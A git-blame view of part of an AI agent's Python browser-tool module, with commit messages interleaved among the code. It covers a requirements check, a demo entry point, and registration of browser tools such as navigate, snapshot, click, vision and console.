* docs(browser): add dialog_policy + dialog_timeout_s to configuration.md, fix tool count
Pre-merge docs audit revealed two gaps:
1. user-guide/configuration.md browser config example was missing the
two new dialog_* knobs. Added with a short table explaining
must_respond / auto_dismiss / auto_accept semantics and a link to
the feature page for the full workflow.
2. reference/tools-reference.md header said '54 built-in tools' — real
count on main is 54, this branch adds browser_dialog so it's 55.
Fixed the header. (browser count was already correctly bumped
11 -> 12 in the earlier docs commit.)
No code changes.
2026-04-23 22:23:37 -07:00
# Tear down CDP supervisors for all tasks so background threads exit.
try :
from tools . browser_supervisor import SUPERVISOR_REGISTRY # type: ignore[import-not-found]
SUPERVISOR_REGISTRY . stop_all ( )
except Exception :
pass
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
# Reset cached lookups so they are re-evaluated on next use.
global _cached_agent_browser , _agent_browser_resolved
global _cached_command_timeout , _command_timeout_resolved
_cached_agent_browser = None
_agent_browser_resolved = False
_discover_homebrew_node_dirs . cache_clear ( )
_cached_command_timeout = None
_command_timeout_resolved = False
2026-01-29 06:10:24 +00:00
# ============================================================================
# Requirements Check
# ============================================================================
def check_browser_requirements ( ) - > bool :
"""
Check if browser tool requirements are met .
2026-03-07 01:14:57 -08:00
2026-04-06 14:05:26 -07:00
In * * local mode * * ( no cloud provider configured ) : only the
` ` agent - browser ` ` CLI must be findable .
In * * cloud mode * * ( Browserbase , Browser Use , or Firecrawl ) : the CLI
* and * the provider ' s required credentials must be present.
2026-03-07 01:14:57 -08:00
2026-01-29 06:10:24 +00:00
Returns :
True if all requirements are met , False otherwise
"""
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
# Camofox backend — only needs the server URL, no agent-browser CLI
if _is_camofox_mode ( ) :
return True
2026-03-07 01:14:57 -08:00
# The agent-browser CLI is always required
2026-01-29 06:10:24 +00:00
try :
2026-04-09 13:46:08 +02:00
browser_cmd = _find_agent_browser ( )
2026-01-29 06:10:24 +00:00
except FileNotFoundError :
return False
2026-04-09 13:46:08 +02:00
# On Termux, the bare npx fallback is too fragile to treat as a satisfied
# local browser dependency. Require a real install (global or local) so the
# browser tool is not advertised as available when it will likely fail on
# first use.
2026-04-09 14:16:58 +02:00
if _requires_real_termux_browser_install ( browser_cmd ) :
2026-04-09 13:46:08 +02:00
return False
2026-03-17 00:16:34 -07:00
# In cloud mode, also require provider credentials
provider = _get_cloud_provider ( )
if provider is not None and not provider . is_configured ( ) :
return False
2026-03-07 01:14:57 -08:00
return True
2026-01-29 06:10:24 +00:00
# ============================================================================
# Module Test
# ============================================================================
if __name__ == " __main__ " :
"""
Simple test / demo when run directly
"""
print ( " 🌐 Browser Tool Module " )
print ( " = " * 40 )
2026-03-07 01:14:57 -08:00
2026-03-17 00:16:34 -07:00
_cp = _get_cloud_provider ( )
mode = " local " if _cp is None else f " cloud ( { _cp . provider_name ( ) } ) "
2026-03-07 01:14:57 -08:00
print ( f " Mode: { mode } " )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Check requirements
if check_browser_requirements ( ) :
print ( " ✅ All requirements met " )
else :
print ( " ❌ Missing requirements: " )
try :
2026-04-09 14:16:58 +02:00
browser_cmd = _find_agent_browser ( )
if _requires_real_termux_browser_install ( browser_cmd ) :
print ( " - bare npx fallback found (insufficient on Termux local mode) " )
print ( f " Install: { _browser_install_hint ( ) } " )
2026-01-29 06:10:24 +00:00
except FileNotFoundError :
print ( " - agent-browser CLI not found " )
2026-04-09 14:16:58 +02:00
print ( f " Install: { _browser_install_hint ( ) } " )
2026-03-17 00:16:34 -07:00
if _cp is not None and not _cp . is_configured ( ) :
print ( f " - { _cp . provider_name ( ) } credentials not configured " )
2026-03-26 15:27:27 -07:00
print ( " Tip: set browser.cloud_provider to ' local ' to use free local mode instead " )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
print ( " \n 📋 Available Browser Tools: " )
for schema in BROWSER_TOOL_SCHEMAS :
print ( f " 🔹 { schema [ ' name ' ] } : { schema [ ' description ' ] [ : 60 ] } ... " )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
print ( " \n 💡 Usage: " )
print ( " from tools.browser_tool import browser_navigate, browser_snapshot " )
print ( " result = browser_navigate( ' https://example.com ' , task_id= ' my_task ' ) " )
print ( " snapshot = browser_snapshot(task_id= ' my_task ' ) " )
2026-02-21 20:22:33 -08:00
# ---------------------------------------------------------------------------
# Registry
# ---------------------------------------------------------------------------
refactor: add tool_error/tool_result helpers + read_raw_config, migrate 129 callsites
Add three reusable helpers to eliminate pervasive boilerplate:
tools/registry.py — tool_error() and tool_result():
Every tool handler returns JSON strings. The pattern
json.dumps({"error": msg}, ensure_ascii=False) appeared 106 times,
and json.dumps({"success": False, "error": msg}, ...) another 23.
Now: tool_error(msg) or tool_error(msg, success=False).
tool_result() handles arbitrary result dicts:
tool_result(success=True, data=payload) or tool_result(some_dict).
hermes_cli/config.py — read_raw_config():
Lightweight YAML reader that returns the raw config dict without
load_config()'s deep-merge + migration overhead. Available for
callsites that just need a single config value.
Migration (129 callsites across 32 files):
- tools/: browser_camofox (18), file_tools (10), homeassistant (8),
web_tools (7), skill_manager (7), cronjob (11), code_execution (4),
delegate (5), send_message (4), tts (4), memory (7), session_search (3),
mcp (2), clarify (2), skills_tool (3), todo (1), vision (1),
browser (1), process_registry (2), image_gen (1)
- plugins/memory/: honcho (9), supermemory (9), hindsight (8),
holographic (7), openviking (7), mem0 (7), byterover (6), retaindb (2)
- agent/: memory_manager (2), builtin_memory_provider (1)
2026-04-07 13:36:20 -07:00
from tools . registry import registry , tool_error
2026-02-21 20:22:33 -08:00
_BROWSER_SCHEMA_MAP = { s [ " name " ] : s for s in BROWSER_TOOL_SCHEMAS }
registry . register (
name = " browser_navigate " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_navigate " ] ,
2026-03-14 11:34:31 -07:00
handler = lambda args , * * kw : browser_navigate ( url = args . get ( " url " , " " ) , task_id = kw . get ( " task_id " ) ) ,
2026-02-21 20:22:33 -08:00
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " 🌐 " ,
2026-02-21 20:22:33 -08:00
)
registry . register (
name = " browser_snapshot " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_snapshot " ] ,
handler = lambda args , * * kw : browser_snapshot (
full = args . get ( " full " , False ) , task_id = kw . get ( " task_id " ) , user_task = kw . get ( " user_task " ) ) ,
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " 📸 " ,
2026-02-21 20:22:33 -08:00
)
registry . register (
name = " browser_click " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_click " ] ,
2026-03-17 04:32:39 -07:00
handler = lambda args , * * kw : browser_click ( ref = args . get ( " ref " , " " ) , task_id = kw . get ( " task_id " ) ) ,
2026-02-21 20:22:33 -08:00
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " 👆 " ,
2026-02-21 20:22:33 -08:00
)
registry . register (
name = " browser_type " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_type " ] ,
2026-03-17 04:32:39 -07:00
handler = lambda args , * * kw : browser_type ( ref = args . get ( " ref " , " " ) , text = args . get ( " text " , " " ) , task_id = kw . get ( " task_id " ) ) ,
2026-02-21 20:22:33 -08:00
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " ⌨️ " ,
2026-02-21 20:22:33 -08:00
)
registry . register (
name = " browser_scroll " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_scroll " ] ,
2026-03-17 04:32:39 -07:00
handler = lambda args , * * kw : browser_scroll ( direction = args . get ( " direction " , " down " ) , task_id = kw . get ( " task_id " ) ) ,
2026-02-21 20:22:33 -08:00
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " 📜 " ,
2026-02-21 20:22:33 -08:00
)
registry . register (
name = " browser_back " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_back " ] ,
handler = lambda args , * * kw : browser_back ( task_id = kw . get ( " task_id " ) ) ,
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " ◀️ " ,
2026-02-21 20:22:33 -08:00
)
registry . register (
name = " browser_press " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_press " ] ,
2026-03-14 11:34:31 -07:00
handler = lambda args , * * kw : browser_press ( key = args . get ( " key " , " " ) , task_id = kw . get ( " task_id " ) ) ,
2026-02-21 20:22:33 -08:00
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " ⌨️ " ,
2026-02-21 20:22:33 -08:00
)
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
2026-02-21 20:22:33 -08:00
registry . register (
name = " browser_get_images " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_get_images " ] ,
handler = lambda args , * * kw : browser_get_images ( task_id = kw . get ( " task_id " ) ) ,
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " 🖼️ " ,
2026-02-21 20:22:33 -08:00
)
registry . register (
name = " browser_vision " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_vision " ] ,
2026-03-14 11:34:31 -07:00
handler = lambda args , * * kw : browser_vision ( question = args . get ( " question " , " " ) , annotate = args . get ( " annotate " , False ) , task_id = kw . get ( " task_id " ) ) ,
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " 👁️ " ,
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
)
registry . register (
name = " browser_console " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_console " ] ,
2026-04-05 12:42:52 -07:00
handler = lambda args , * * kw : browser_console ( clear = args . get ( " clear " , False ) , expression = args . get ( " expression " ) , task_id = kw . get ( " task_id " ) ) ,
2026-02-21 20:22:33 -08:00
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " 🖥️ " ,
2026-02-21 20:22:33 -08:00
)